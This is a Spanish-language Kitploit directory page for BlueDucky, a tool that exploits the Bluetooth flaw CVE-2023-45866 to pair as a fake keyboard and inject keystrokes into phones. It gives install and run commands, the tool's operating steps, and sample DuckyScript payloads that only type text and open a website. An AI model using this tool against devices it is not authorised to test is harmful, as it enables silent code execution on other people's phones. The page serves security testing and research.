Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
BlueDucky — BlueDucky explota una vulnerabilidad Bluetooth, específicamente CVE-2023-45866, que permite a un atacante inyectar pulsaciones de teclado en un dispositivo objetivo. El dispositivo del atacante se hace pasar por un teclado Bluetooth para establecer una conexión cifrada sin autorización del usuario. La herramienta BlueDucky automatiza este proceso. | Kitploit
Herramientas/GitHubGitHub/sergeb250/blueducky
Seguridad BluetoothGeneración de PayloadsExplotaciónSeguridad InalámbricaPruebas de PenetraciónRed Teaming
GitHubsergeb250/blueducky

BlueDucky

Ver Repositorio
11hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

BlueDucky explota una vulnerabilidad Bluetooth, específicamente CVE-2023-45866, que permite a un atacante inyectar pulsaciones de teclado en un dispositivo objetivo. El dispositivo del atacante se hace pasar por un teclado Bluetooth para establecer una conexión cifrada sin autorización del usuario. La herramienta BlueDucky automatiza este proceso.

Compartir

BlueDucky Versión 2.1 (Android) 🦆

Gracias a todas las personas de HackNexus. ¡Asegúrate de unirte a nosotros en VC! https://discord.gg/HackNexus

NOTAS: No podré ejecutar esto en una computadora portátil u otro dispositivo fuera de una Raspberry Pi para realizar pruebas. Debido a esto, cualquier problema que tengas deberá resolverse entre ustedes, ya que no tengo fondos adicionales para comprar un adaptador.

  1. GitHub de saad0x1
  2. GitHub de spicydll
  3. GitHub de lamentomori

🚨 CVE-2023-45866 - Implementación de BlueDucky (Usando DuckyScript)

🔓 Emparejamiento no autenticado que lleva a Ejecución de Código (Usando Teclado HID)

Esta es una implementación del CVE descubierto por marcnewlin

Introducción 📢

BlueDucky es una poderosa herramienta para explotar una vulnerabilidad en dispositivos Bluetooth. Al ejecutar este script, puedes:

  1. 📡 Cargar dispositivos Bluetooth guardados que ya no son visibles pero que aún tienen Bluetooth habilitado.
  2. 📂 Guardar automáticamente cualquier dispositivo que escanees.
  3. 💌 Enviar mensajes en formato ducky script para interactuar con dispositivos.

He ejecutado esto con éxito en una Raspberry Pi 4 usando el módulo Bluetooth predeterminado. Funciona contra varios teléfonos, con una excepción interesante para una marca de Nueva Zelanda, Vodafone.

Instalación y Uso 🛠️

Instrucciones de configuración para sistemas basados en Debian

root@kitploit:~
# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Instrucciones de configuración para sistemas basados en Arch

root@kitploit:~
# update pacman & packages
sudo pacman -Syyu

# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Ejecutar BlueDucky

root@kitploit:~
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

alternativamente,

root@kitploit:~
pip3 install -r requirements.txt

Pasos Operativos 🕹️

  1. Al ejecutarse, solicita la dirección MAC del objetivo.
  2. No presionar nada desencadena un escaneo automático de dispositivos.
  3. Los dispositivos encontrados previamente se almacenan en known_devices.txt.
  4. Si known_devices.txt existe, verifica este archivo antes de escanear.
  5. Se ejecuta usando el archivo payload.txt.
  6. Una ejecución exitosa resultará en una conexión automática y la ejecución del script.

Duckyscript 💻

🚧 Trabajo en progreso:

  • Sugiéranme ideas

Versión 2.1 🐛

  • Interfaz de usuario actualizada
  • Experiencia de usuario mejorada
  • Depurador Bluetooth; Comprueba tus adaptadores Bluetooth y las dependencias instaladas antes de permitir el acceso a la aplicación, esto es para evitar dispositivos que no sean compatibles.
  • Nota: Se han realizado numerosos cambios, consulte el historial de commits para cambios específicos.

¿Qué se planea para la próxima versión?

  • Consola DuckyScript integrada para ataques que desean mantener persistencia, después de que se haya ejecutado un payload
  • ¡Sugiere qué debería añadirse a continuación! Únete a https://discord.gg/HackNexus

📝 Ejemplo de payload.txt:

root@kitploit:~
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
root@kitploit:~
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

¡Disfruta experimentando con BlueDucky! 🌟

Descargar herramienta